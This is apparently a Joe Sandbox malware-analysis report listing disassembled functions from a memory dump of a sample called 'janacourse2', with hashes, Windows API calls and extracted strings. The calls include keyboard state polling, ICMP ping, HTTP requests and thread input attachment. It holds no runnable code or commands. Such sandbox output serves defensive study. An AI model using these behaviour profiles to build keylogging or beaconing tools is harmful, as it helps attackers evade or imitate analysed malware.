• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: MessageSend$CharNext
• String ID:
• API String ID: 1350042424-0
• Opcode ID: d5e9dbba1298d340e55499dc7edec87fc48e05251f1203dca0489d19ccb6fab5
• Instruction ID: c1812c1f21db25d5de79156116ff270b87f8f7a2ff096b1c1af1afeb10483791
• Opcode Fuzzy Hash: d5e9dbba1298d340e55499dc7edec87fc48e05251f1203dca0489d19ccb6fab5
• Instruction Fuzzy Hash: E361B4F4904209AFEF209F54CDC49FE7BB9EF0A724F008165FAA59B280D7759A41CB60
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0100FAAF
• SafeArrayAllocData.OLEAUT32(?), ref: 0100FB08
• VariantInit.OLEAUT32(?), ref: 0100FB1A
• SafeArrayAccessData.OLEAUT32(?,?), ref: 0100FB3A
• VariantCopy.OLEAUT32(?,?), ref: 0100FB8D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 0100FBA1
• VariantClear.OLEAUT32(?), ref: 0100FBB6
• SafeArrayDestroyData.OLEAUT32(?), ref: 0100FBC3
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0100FBCC
• VariantClear.OLEAUT32(?), ref: 0100FBDE
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0100FBE9
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
• Opcode ID: 55b9c58969ef0bb6115a652c3c31d6ea3e948f39b37748343c3ee0605afe8ab6
• Instruction ID: 0fb7250ec9d79f920c610c1dda6d305b7b43c31d270a36220388b26203e2e684
• Opcode Fuzzy Hash: 55b9c58969ef0bb6115a652c3c31d6ea3e948f39b37748343c3ee0605afe8ab6
• Instruction Fuzzy Hash: 6D419374A0021ADFEB11DF68CA949EEBBB9FF48344F008055E985A7250CB35E945DFA0
APIs
• GetKeyboardState.USER32(?), ref: 01019CA1
• GetAsyncKeyState.USER32(000000A0), ref: 01019D22
• GetKeyState.USER32(000000A0), ref: 01019D3D
• GetAsyncKeyState.USER32(000000A1), ref: 01019D57
• GetKeyState.USER32(000000A1), ref: 01019D6C
• GetAsyncKeyState.USER32(00000011), ref: 01019D84
• GetKeyState.USER32(00000011), ref: 01019D96
• GetAsyncKeyState.USER32(00000012), ref: 01019DAE
• GetKeyState.USER32(00000012), ref: 01019DC0
• GetAsyncKeyState.USER32(0000005B), ref: 01019DD8
• GetKeyState.USER32(0000005B), ref: 01019DEA
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: e85e5f3924b5e8b33e3e1c7b323ce8604fad385ab3448b50f29f7937e5c9be41
• Instruction ID: 97c50702794176a24cc2477290094bbeda338ab6110f1063bf3855ca78200e98
• Opcode Fuzzy Hash: e85e5f3924b5e8b33e3e1c7b323ce8604fad385ab3448b50f29f7937e5c9be41
• Instruction Fuzzy Hash: 1C41E5346047C96AFFB29668C5643B5BEE06B01308F4880DEDAC6565C7DBAD91C8C7A2
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 010305BC
• inet_addr.WSOCK32(?), ref: 0103061C
• gethostbyname.WSOCK32(?), ref: 01030628
• IcmpCreateFile.IPHLPAPI ref: 01030636
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 010306C6
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 010306E5
• IcmpCloseHandle.IPHLPAPI(?), ref: 010307B9
• WSACleanup.WSOCK32 ref: 010307BF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
• Opcode ID: edfc4932968243185b3e8c2ca29bd447d87aaa2766d114e93b0a98d1be133ab0
• Instruction ID: 92aadd0b4a5f84c0bb2fec145d83339d26804eff1dd95bc6fd5746a3e48379d1
• Opcode Fuzzy Hash: edfc4932968243185b3e8c2ca29bd447d87aaa2766d114e93b0a98d1be133ab0
• Instruction Fuzzy Hash: 5691C3749052019FE321CF19C989F1ABBE4BF84318F048599F5AA8B7A6C735EC45CF91
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: _wcslen$BuffCharLower
• String ID: cdecl$none$stdcall$winapi
• API String ID: 707087890-567219261
• Opcode ID: 1abfc9e8a769c206ca23f5d985736cf79983ded89c6c4a6ee2a5c1e12aa5091d
• Instruction ID: bae8a822edfc28dc62f61076d3113e1f51b205a74666ba1fa50e950a179c98ba
• Opcode Fuzzy Hash: 1abfc9e8a769c206ca23f5d985736cf79983ded89c6c4a6ee2a5c1e12aa5091d
• Instruction Fuzzy Hash: 1351C431A001169BCF15EF6CC9508BEB7E9BF94720B2483AAF5A6E7285D735DD40C7A0
APIs
• CoInitialize.OLE32 ref: 01033774
• CoUninitialize.OLE32 ref: 0103377F
• CoCreateInstance.OLE32(?,00000000,00000017,0104FB78,?), ref: 010337D9
• IIDFromString.OLE32(?,?), ref: 0103384C
• VariantInit.OLEAUT32(?), ref: 010338E4
• VariantClear.OLEAUT32(?), ref: 01033936
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 636576611-1287834457
• Opcode ID: 7ad9863983b68bf227b46c5ac45be4ddba92ca1e40e3d761aba76de239d397db
• Instruction ID: 7f631f2afbb3b3618427e714c55ea0764ae0b66b6dcbadf35db226759cfda0ff
• Opcode Fuzzy Hash: 7ad9863983b68bf227b46c5ac45be4ddba92ca1e40e3d761aba76de239d397db
• Instruction Fuzzy Hash: 80619C74608301AFD321DF54C989BAABBE8BF89714F00085DF9C59B291C774E948CB92
APIs
• LoadStringW.USER32(00000066,?,00000FFF,?), ref: 010233CF
  • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
• LoadStringW.USER32(00000072,?,00000FFF,?), ref: 010233F0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LoadString$_wcslen
                                                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                            • API String ID: 4099089115-3080491070
                                                                                                            • Opcode ID: b305aa55b6487b8a76eddde309553add09eac835ad59fc06d43a6468285c5627
                                                                                                            • Instruction ID: 1e27c79796ca1e095b1125224ff9423b2d1e3714426d4cc16bb2f94801398016
                                                                                                            • Opcode Fuzzy Hash: b305aa55b6487b8a76eddde309553add09eac835ad59fc06d43a6468285c5627
                                                                                                            • Instruction Fuzzy Hash: 1951AF7180021AABDF14EBA1CE42EEEB7B9AF18340F544065F14576051EB3A6F98EF60
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$BuffCharUpper
                                                                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 010253A0
                                                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 01025416
                                                                                                            • GetLastError.KERNEL32 ref: 01025420
                                                                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 010254A7
                                                                                                            Strings
                                                                                                            Similarity
                                                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                            APIs
                                                                                                            • CreateMenu.USER32 ref: 01043C79
                                                                                                            • SetMenu.USER32(?,00000000), ref: 01043C88
                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01043D10
                                                                                                            • IsMenu.USER32(?), ref: 01043D24
                                                                                                            • CreatePopupMenu.USER32 ref: 01043D2E
                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 01043D5B
                                                                                                            • DrawMenuBar.USER32 ref: 01043D63
                                                                                                            Strings
                                                                                                            Similarity
                                                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                            • String ID: 0$F
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 01043A9D
                                                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 01043AA0
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 01043AC7
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01043AEA
                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 01043B62
                                                                                                            • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 01043BAC
                                                                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 01043BC7
                                                                                                            • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 01043BE2
                                                                                                            • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 01043BF6
                                                                                                            • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 01043C13
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$LongWindow
                                                                                                            • String ID:
                                                                                                            APIs
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0101B151
                                                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0101A1E1,?,00000001), ref: 0101B165
                                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 0101B16C
                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0101A1E1,?,00000001), ref: 0101B17B
                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0101B18D
                                                                                                            • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0101A1E1,?,00000001), ref: 0101B1A6
                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0101A1E1,?,00000001), ref: 0101B1B8
                                                                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0101A1E1,?,00000001), ref: 0101B1FD
                                                                                                            • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0101A1E1,?,00000001), ref: 0101B212
                                                                                                            • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0101A1E1,?,00000001), ref: 0101B21D
                                                                                                            Similarity
                                                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                            • String ID:
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00FE2C94
                                                                                                              • Part of subcall function 00FE29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00FED7D1,00000000,00000000,00000000,00000000,?,00FED7F8,00000000,00000007,00000000,?,00FEDBF5,00000000), ref: 00FE29DE
                                                                                                              • Part of subcall function 00FE29C8: GetLastError.KERNEL32(00000000,?,00FED7D1,00000000,00000000,00000000,00000000,?,00FED7F8,00000000,00000007,00000000,?,00FEDBF5,00000000,00000000), ref: 00FE29F0
                                                                                                            • _free.LIBCMT ref: 00FE2CA0
                                                                                                            • _free.LIBCMT ref: 00FE2CAB
                                                                                                            • _free.LIBCMT ref: 00FE2CB6
                                                                                                            • _free.LIBCMT ref: 00FE2CC1
                                                                                                            • _free.LIBCMT ref: 00FE2CCC
                                                                                                            • _free.LIBCMT ref: 00FE2CD7
                                                                                                            • _free.LIBCMT ref: 00FE2CE2
                                                                                                            • _free.LIBCMT ref: 00FE2CED
                                                                                                            • _free.LIBCMT ref: 00FE2CFB
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            APIs
                                                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00FB1459
                                                                                                            • OleUninitialize.OLE32(?,00000000), ref: 00FB14F8
                                                                                                            • UnregisterHotKey.USER32(?), ref: 00FB16DD
                                                                                                            • DestroyWindow.USER32(?), ref: 00FF24B9
                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00FF251E
                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00FF254B
                                                                                                            Strings
                                                                                                            Similarity
                                                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                            • String ID: close all
                                                                                                            APIs
                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 01027FAD
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 01027FC1
                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 01027FEB
                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 01028005
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 01028017
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 01028060
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 010280B0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentDirectory$AttributesFile
                                                                                                            • String ID: *.*
                                                                                                            • API String ID: 769691225-438819550
                                                                                                            • Opcode ID: 0ca43ab246d35a145c8fa4c2d29e8a381e92118b8867db6bd5580a7e8e41faa2
                                                                                                            • Instruction ID: 2e349e69ef1395d745b00b4b663212f5cd725403fe0b498afc28bc4d7ef5533d
                                                                                                            • Opcode Fuzzy Hash: 0ca43ab246d35a145c8fa4c2d29e8a381e92118b8867db6bd5580a7e8e41faa2
                                                                                                            • Instruction Fuzzy Hash: 0881C2725043119BDB64EF18C8849AEB7E8BF98310F148C5EF9C5C7251E739E945CBA2
                                                                                                            APIs
                                                                                                            • SetWindowLongW.USER32(?,000000EB), ref: 00FB5C7A
                                                                                                              • Part of subcall function 00FB5D0A: GetClientRect.USER32(?,?), ref: 00FB5D30
                                                                                                              • Part of subcall function 00FB5D0A: GetWindowRect.USER32(?,?), ref: 00FB5D71
                                                                                                              • Part of subcall function 00FB5D0A: ScreenToClient.USER32(?,?), ref: 00FB5D99
                                                                                                            • GetDC.USER32 ref: 00FF46F5
                                                                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00FF4708
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00FF4716
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00FF472B
                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00FF4733
                                                                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00FF47C4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                            • String ID: U
                                                                                                            • API String ID: 4009187628-3372436214
                                                                                                            • Opcode ID: 16883055be64d7cdea2924965c37357583419feed9a58c1cbf25ee7d0529f3a3
                                                                                                            • Instruction ID: f95c2f794b3199f8309eac597c0f52e84cb6eaa9a65b95b055d486045819d1e9
                                                                                                            • Opcode Fuzzy Hash: 16883055be64d7cdea2924965c37357583419feed9a58c1cbf25ee7d0529f3a3
                                                                                                            • Instruction Fuzzy Hash: B971F376800209DFCF219F64C984AFB7BB2FF4A364F144269EE919A179C335A841EF50
                                                                                                            APIs
                                                                                                            • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 010235E4
                                                                                                              • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
                                                                                                            • LoadStringW.USER32(01082390,?,00000FFF,?), ref: 0102360A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LoadString$_wcslen
                                                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                            • API String ID: 4099089115-2391861430
                                                                                                            • Opcode ID: 66640b43dbacd23bf60456edb9ff3308bfd62675ef4662728dec144211a0fd91
                                                                                                            • Instruction ID: 7a7056087d6932037015b2adaac1e9281d33fe925db0ddabd15fba86aba58a04
                                                                                                            • Opcode Fuzzy Hash: 66640b43dbacd23bf60456edb9ff3308bfd62675ef4662728dec144211a0fd91
                                                                                                            • Instruction Fuzzy Hash: 8A51A071C0021ABBDF24EBA1CC82EEEBB79BF14300F544165F24576051DB395A99EFA0
                                                                                                            APIs
                                                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0102C272
                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0102C29A
                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0102C2CA
                                                                                                            • GetLastError.KERNEL32 ref: 0102C322
                                                                                                            • SetEvent.KERNEL32(?), ref: 0102C336
                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0102C341
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3113390036-3916222277
                                                                                                            • Opcode ID: 02ef89064dafa8935bbc43d99a2f7e0f2993f18100162b27e060c68605fad0d5
                                                                                                            • Instruction ID: 521e8f971c50e9a5a91dbf990b22d4a2406256d073403268618df643fe5d3edb
                                                                                                            • Opcode Fuzzy Hash: 02ef89064dafa8935bbc43d99a2f7e0f2993f18100162b27e060c68605fad0d5
                                                                                                            • Instruction Fuzzy Hash: A831A2B1500614AFF731DF688B84AAF7BFCEB49644B04895DE4CAD3200DB75DA448B60
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00FF3AAF,?,?,Bad directive syntax error,0104CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 010198BC
                                                                                                            • LoadStringW.USER32(00000000,?,00FF3AAF,?), ref: 010198C3
                                                                                                              • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
                                                                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 01019987
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                            • API String ID: 858772685-4153970271
                                                                                                            • Opcode ID: c25b52d974de9bb3b7bf9c3dfde163776ae84a4290d732f197d1941bf5f1edb7
                                                                                                            • Instruction ID: 28b0163a08152313af14063ee6056dee99eb8c968a0247a3dc14c6dc21a19c39
                                                                                                            • Opcode Fuzzy Hash: c25b52d974de9bb3b7bf9c3dfde163776ae84a4290d732f197d1941bf5f1edb7
                                                                                                            • Instruction Fuzzy Hash: 7121A031C4021EBBDF11AF91CC46EEE7B76BF18304F044469F655660A2EB7A9658DF10
                                                                                                            APIs
                                                                                                            • GetParent.USER32 ref: 010120AB
                                                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 010120C0
                                                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0101214D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassMessageNameParentSend
                                                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                            • API String ID: 1290815626-3381328864
                                                                                                            • Opcode ID: 6e730aa9130c38932f496d9fcf5af03e1561afc4c66b2974cb628206411b3aba
                                                                                                            • Instruction ID: 6872161c5fefbdbff34f14ea41fc951f5e4823afac3801d4591210f27bde6b29
                                                                                                            • Opcode Fuzzy Hash: 6e730aa9130c38932f496d9fcf5af03e1561afc4c66b2974cb628206411b3aba
                                                                                                            • Instruction Fuzzy Hash: 02113D7E584306B6F6157524DC06CFA339CCB15324B30005AFB84A8096FA7D74015A18
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f85c585f87b38ac7ec176d0d37f9ccd66126197b84f65351b33e1393e7fc1d75
                                                                                                            • Instruction ID: 48425190d77af11c2b32ca5bfc872d0380ac03574edf7ca640afa96e3f296b60
                                                                                                            • Opcode Fuzzy Hash: f85c585f87b38ac7ec176d0d37f9ccd66126197b84f65351b33e1393e7fc1d75
                                                                                                            • Instruction Fuzzy Hash: F6C12775D082C99FCB11EFAACC40BAD7BB1AF09320F044199F559A7392C7798941EB70
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
